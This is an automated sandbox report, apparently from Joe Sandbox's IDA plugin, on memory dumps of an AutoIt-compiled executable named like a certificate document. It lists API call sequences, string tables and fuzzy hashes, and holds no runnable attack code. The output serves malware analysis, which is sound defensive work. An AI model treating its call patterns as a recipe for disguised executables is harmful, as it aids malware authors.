                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode$DriveType
                                                                              • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                              • API String ID: 2907320926-4222207086
                                                                              • Opcode ID: c7737af67fef86cfd56deb4a657fdba5d09b408fb84ac493700a488cf874e355
                                                                              • Instruction ID: 73d0b8cad3d6ac80a9dba883e86e45fa7c296d1c117a7096f75133154e51080a
                                                                              • Opcode Fuzzy Hash: c7737af67fef86cfd56deb4a657fdba5d09b408fb84ac493700a488cf874e355
                                                                              • Instruction Fuzzy Hash: DA51B33034830AEBC224EF14C8869B9B7A2FB94720B25491AF267D7395DB7CDD45D742
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: __wcsnicmp
                                                                              • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                              • API String ID: 1038674560-86951937
                                                                              • Opcode ID: 4765f4a22f76bc9294f47cf8a8fb8c6ddb750cfa6a20ade23f7d6105075149c4
                                                                              • Instruction ID: eb02776338f650374ac0b4c95269fffda5b908678d98db312d4d0cbd350ebfc5
                                                                              • Opcode Fuzzy Hash: 4765f4a22f76bc9294f47cf8a8fb8c6ddb750cfa6a20ade23f7d6105075149c4
                                                                              • Instruction Fuzzy Hash: 2081D874740219FBDB26AA64DC56FEF3779FF24310F048029F905EB282EB68D941D2A1
                                                                              APIs
                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 0081C788
                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0081C83E
                                                                              • SendMessageW.USER32(?,00001102,00000002,?), ref: 0081C859
                                                                              • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0081CB15
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Window
                                                                              • String ID: 0
                                                                              • API String ID: 2326795674-4108050209
                                                                              • Opcode ID: c0ab5f5a0418df5edad2f0b4a66882c1f95d0c44f4313fff483926e986767ec8
                                                                              • Instruction ID: 6d97bded59f215a30844bb5a8fad446c78e017d12a1cf492487c62b84a950839
                                                                              • Opcode Fuzzy Hash: c0ab5f5a0418df5edad2f0b4a66882c1f95d0c44f4313fff483926e986767ec8
                                                                              • Instruction Fuzzy Hash: B2F1E5B1188305AFD7218F28C88ABEABBE8FF45754F04092DF599D62A1D774CC80CB91
                                                                              APIs
                                                                              • CharUpperBuffW.USER32(?,?,0084DC00), ref: 00816449
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharUpper
                                                                              • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                              • API String ID: 3964851224-45149045
                                                                              • Opcode ID: 641cf185c167a4dc2b9e08e80b4f4fe9d423593ffabf44ba05b820360c0bca6b
                                                                              • Instruction ID: e708c8353150a4186d4ea1d7e6568fa15feb08c5c2b29b3c03fb4c93bee8e48c
                                                                              • Opcode Fuzzy Hash: 641cf185c167a4dc2b9e08e80b4f4fe9d423593ffabf44ba05b820360c0bca6b
                                                                              • Instruction Fuzzy Hash: 97C18030204249CBCB14EF10C555AEE77A9FF95348F04486CF996DB2D2EB24ED9ACB91
                                                                              APIs
                                                                              • GetSysColor.USER32(00000012), ref: 0081D5AE
                                                                              • SetTextColor.GDI32(?,?), ref: 0081D5B2
                                                                              • GetSysColorBrush.USER32(0000000F), ref: 0081D5C8
                                                                              • GetSysColor.USER32(0000000F), ref: 0081D5D3
                                                                              • CreateSolidBrush.GDI32(?), ref: 0081D5D8
                                                                              • GetSysColor.USER32(00000011), ref: 0081D5F0
                                                                              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0081D5FE
                                                                              • SelectObject.GDI32(?,00000000), ref: 0081D60F
                                                                              • SetBkColor.GDI32(?,00000000), ref: 0081D618
                                                                              • SelectObject.GDI32(?,?), ref: 0081D625
                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 0081D644
                                                                              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0081D65B
                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0081D670
                                                                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0081D698
                                                                              • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0081D6BF
                                                                              • InflateRect.USER32(?,000000FD,000000FD), ref: 0081D6DD
                                                                              • DrawFocusRect.USER32(?,?), ref: 0081D6E8
                                                                              • GetSysColor.USER32(00000011), ref: 0081D6F6
                                                                              • SetTextColor.GDI32(?,00000000), ref: 0081D6FE
                                                                              • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0081D712
                                                                              • SelectObject.GDI32(?,0081D2A5), ref: 0081D729
                                                                              • DeleteObject.GDI32(?), ref: 0081D734
                                                                              • SelectObject.GDI32(?,?), ref: 0081D73A
                                                                              • DeleteObject.GDI32(?), ref: 0081D73F
                                                                              • SetTextColor.GDI32(?,?), ref: 0081D745
                                                                              • SetBkColor.GDI32(?,?), ref: 0081D74F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                              • String ID:
                                                                              • API String ID: 1996641542-0
                                                                              • Opcode ID: cef3123dfa28da93bd202982e4114f1cb84fce404e178d1684f25caec191239d
                                                                              • Instruction ID: f138fbafd23f66cf017265de2230858a30051e44962c2df9b689ebff997d45be
                                                                              • Opcode Fuzzy Hash: cef3123dfa28da93bd202982e4114f1cb84fce404e178d1684f25caec191239d
                                                                              • Instruction Fuzzy Hash: 25511B72900218EFDF109FA4EC48EEEBB7AFF48324F104915F915AB2A1D7759A40DB90
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0081B7B0
                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0081B7C1
                                                                              • CharNextW.USER32(0000014E), ref: 0081B7F0
                                                                              • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0081B831
                                                                              • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0081B847
                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0081B858
                                                                              • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0081B875
                                                                              • SetWindowTextW.USER32(?,0000014E), ref: 0081B8C7
                                                                              • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0081B8DD
                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 0081B90E
                                                                              • _memset.LIBCMT ref: 0081B933
                                                                              • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0081B97C
                                                                              • _memset.LIBCMT ref: 0081B9DB
                                                                              • SendMessageW.USER32 ref: 0081BA05
                                                                              • SendMessageW.USER32(?,00001074,?,00000001), ref: 0081BA5D
                                                                              • SendMessageW.USER32(?,0000133D,?,?), ref: 0081BB0A
                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0081BB2C
                                                                              • GetMenuItemInfoW.USER32(?), ref: 0081BB76
                                                                              • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0081BBA3
                                                                              • DrawMenuBar.USER32(?), ref: 0081BBB2
                                                                              • SetWindowTextW.USER32(?,0000014E), ref: 0081BBDA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                              • String ID: 0
                                                                              • API String ID: 1073566785-4108050209
                                                                              • Opcode ID: f60fc3cea6a5beabea0fb0c14553b467d6744300101d357c57f3440b7f9e0d6d
                                                                              • Instruction ID: 8e42d5431187985d6f695c4362fc90a65c208862dabceca1cce8cb3766759941
                                                                              • Opcode Fuzzy Hash: f60fc3cea6a5beabea0fb0c14553b467d6744300101d357c57f3440b7f9e0d6d
                                                                              • Instruction Fuzzy Hash: F0E19F71900218ABDF209F65DC89EEE7B7CFF15724F14815AF929EA290D7748A81CF60
                                                                              APIs
                                                                              • GetCursorPos.USER32(?), ref: 0081778A
                                                                              • GetDesktopWindow.USER32 ref: 0081779F
                                                                              • GetWindowRect.USER32(00000000), ref: 008177A6
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00817808
                                                                              • DestroyWindow.USER32(?), ref: 00817834
                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0081785D
                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0081787B
                                                                              • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 008178A1
                                                                              • SendMessageW.USER32(?,00000421,?,?), ref: 008178B6
                                                                              • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 008178C9
                                                                              • IsWindowVisible.USER32(?), ref: 008178E9
                                                                              • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00817904
                                                                              • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00817918
                                                                              • GetWindowRect.USER32(?,?), ref: 00817930
                                                                              • MonitorFromPoint.USER32(?,?,00000002), ref: 00817956
                                                                              • GetMonitorInfoW.USER32 ref: 00817970
                                                                              • CopyRect.USER32(?,?), ref: 00817987
                                                                              • SendMessageW.USER32(?,00000412,00000000), ref: 008179F2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                              • String ID: ($0$tooltips_class32
                                                                              • API String ID: 698492251-4156429822
                                                                              • Opcode ID: 792c06d33d038e2b935b752a937a1923d89b0123e17795bd6b5e0091cd8763eb
                                                                              • Instruction ID: e561a10e6394bf242e9f0fcfd556f07532fb856b2a0e37e6f8cf7d960321b225
                                                                              • Opcode Fuzzy Hash: 792c06d33d038e2b935b752a937a1923d89b0123e17795bd6b5e0091cd8763eb
                                                                              • Instruction Fuzzy Hash: B8B17B71608340AFDB04DF64C949BAABBE9FF88310F00891DF599DB291DB74E844CB96
                                                                              APIs
                                                                              • GetFileVersionInfoSizeW.VERSION(?,?), ref: 007F6CFB
                                                                              • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 007F6D21
                                                                              • _wcscpy.LIBCMT ref: 007F6D4F
                                                                              • _wcscmp.LIBCMT ref: 007F6D5A
                                                                              • _wcscat.LIBCMT ref: 007F6D70
                                                                              • _wcsstr.LIBCMT ref: 007F6D7B
                                                                              • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 007F6D97
                                                                              • _wcscat.LIBCMT ref: 007F6DE0
                                                                              • _wcscat.LIBCMT ref: 007F6DE7
                                                                              • _wcsncpy.LIBCMT ref: 007F6E12
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                              • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                              • API String ID: 699586101-1459072770
                                                                              • Opcode ID: 9540ee6fd818ba0466342d0261f01540b29a78a5cc9f775900b23d2fa2da23fc
                                                                              • Instruction ID: 6532ee4aa94d00310b10b136fab0b41a04a82445617872e5140576778bfddb60
                                                                              • Opcode Fuzzy Hash: 9540ee6fd818ba0466342d0261f01540b29a78a5cc9f775900b23d2fa2da23fc
                                                                              • Instruction Fuzzy Hash: 8A41A672600214BBEB04AB64DD4BEBF777CEF51710F14006AFA15E6382EA7C9A1196A1
                                                                              APIs
                                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 007CA939
                                                                              • GetSystemMetrics.USER32(00000007), ref: 007CA941
                                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 007CA96C
                                                                              • GetSystemMetrics.USER32(00000008), ref: 007CA974
                                                                              • GetSystemMetrics.USER32(00000004), ref: 007CA999
                                                                              • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 007CA9B6
                                                                              • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 007CA9C6
                                                                              • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 007CA9F9
                                                                              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 007CAA0D
                                                                              • GetClientRect.USER32(00000000,000000FF), ref: 007CAA2B
                                                                              • GetStockObject.GDI32(00000011), ref: 007CAA47
                                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 007CAA52
                                                                                • Part of subcall function 007CB63C: GetCursorPos.USER32(000000FF), ref: 007CB64F
                                                                                • Part of subcall function 007CB63C: ScreenToClient.USER32(00000000,000000FF), ref: 007CB66C
                                                                                • Part of subcall function 007CB63C: GetAsyncKeyState.USER32(00000001), ref: 007CB691
                                                                                • Part of subcall function 007CB63C: GetAsyncKeyState.USER32(00000002), ref: 007CB69F
                                                                              • SetTimer.USER32(00000000,00000000,00000028,007CAB87), ref: 007CAA79
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                              • String ID: AutoIt v3 GUI
                                                                              • API String ID: 1458621304-248962490
                                                                              • Opcode ID: a7283d4c2b4a0ee08d0fcc1331a2cdc594e8583d76811ea616afe31c491d7d54
                                                                              • Instruction ID: 528211571afae04b89c6165ff593b8f1a9e13f76589a90f1d60a1bdd1cfd34cb
                                                                              • Opcode Fuzzy Hash: a7283d4c2b4a0ee08d0fcc1331a2cdc594e8583d76811ea616afe31c491d7d54
                                                                              • Instruction Fuzzy Hash: 92B15A71A0021AAFDF14DFA8DC4AFAE7BB4FB58315F114219FA15E6290DB34E881CB51
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Foreground
                                                                              • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                              • API String ID: 62970417-1919597938
                                                                              • Opcode ID: 0ff4d051552513a16b50fc540adcad35265f786bcbd7f6f64ed8c0230514ef2b
                                                                              • Instruction ID: 96286c465dd0cc595f4ebc9f8c8207a5d3fb6e04c048104d30947243a4372b95
                                                                              • Opcode Fuzzy Hash: 0ff4d051552513a16b50fc540adcad35265f786bcbd7f6f64ed8c0230514ef2b
                                                                              • Instruction Fuzzy Hash: D6D1E430104746EBCB14EF60D885AAAFBB0FF54344F004A1DF456D72A2DB78E99ACB91
                                                                              APIs
                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00813735
                                                                              • RegCreateKeyExW.ADVAPI32(?,?,00000000,0084DC00,00000000,?,00000000,?,?), ref: 008137A3
                                                                              • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 008137EB
                                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00813874
                                                                              • RegCloseKey.ADVAPI32(?), ref: 00813B94
                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00813BA1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Close$ConnectCreateRegistryValue
                                                                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                              • API String ID: 536824911-966354055
                                                                              • Opcode ID: 0d1093cd1158a11957f67f625ae3e79e00563d3cf079b87af28823505aa770ea
                                                                              • Instruction ID: b0e42336c3b6287a5ba9f33367ffbd59ee9ac7171de34c9d3de6410902ff4f0c
                                                                              • Opcode Fuzzy Hash: 0d1093cd1158a11957f67f625ae3e79e00563d3cf079b87af28823505aa770ea
                                                                              • Instruction Fuzzy Hash: 11022575204601DFCB14EF24C859A6AB7E9FF88720F05885DF99A9B3A1DB34ED41CB81
                                                                              APIs
                                                                              • CharUpperBuffW.USER32(?,?), ref: 00816C56
                                                                              • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00816D16
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharMessageSendUpper
                                                                              • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                              • API String ID: 3974292440-719923060
                                                                              • Opcode ID: bd62034eb157f28275d8b3326fc2d3aff4bc8c32b4ef01da8d6cf0c4feee469d
                                                                              • Instruction ID: fda4f35f3ca72426e6a42c46ff1dd0f6c796b791cbf0a584a0e24ef4fb37fea0
                                                                              • Opcode Fuzzy Hash: bd62034eb157f28275d8b3326fc2d3aff4bc8c32b4ef01da8d6cf0c4feee469d
                                                                              • Instruction Fuzzy Hash: 14A19E30204245DBCB14EF20C956BAAB7A9FF44314F10496CB996DB3D2EB35EC5ACB51
                                                                              APIs
                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 007ECF91
                                                                              • __swprintf.LIBCMT ref: 007ED032
                                                                              • _wcscmp.LIBCMT ref: 007ED045
                                                                              • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 007ED09A
                                                                              • _wcscmp.LIBCMT ref: 007ED0D6
                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 007ED10D
                                                                              • GetDlgCtrlID.USER32(?), ref: 007ED15F
                                                                              • GetWindowRect.USER32(?,?), ref: 007ED195
                                                                              • GetParent.USER32(?), ref: 007ED1B3
                                                                              • ScreenToClient.USER32(00000000), ref: 007ED1BA
                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 007ED234
                                                                              • _wcscmp.LIBCMT ref: 007ED248
                                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 007ED26E
                                                                              • _wcscmp.LIBCMT ref: 007ED282
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                                              • String ID: %s%u
                                                                              • API String ID: 3119225716-679674701
                                                                              • Opcode ID: 7fe2a2d5368ca62604de930d1652a8df2d30f9d3a2e424784d3cc8354970269b
                                                                              • Instruction ID: 9cf11ce0333b5d9a22a3dd5e82d302c2f34904b1ca24eb75281587478a62ee80
                                                                              • Opcode Fuzzy Hash: 7fe2a2d5368ca62604de930d1652a8df2d30f9d3a2e424784d3cc8354970269b
                                                                              • Instruction Fuzzy Hash: 06A1E371605346EFD725DF65C884FAAB7A8FF48314F008919FA69D2180EB38EE05CB91
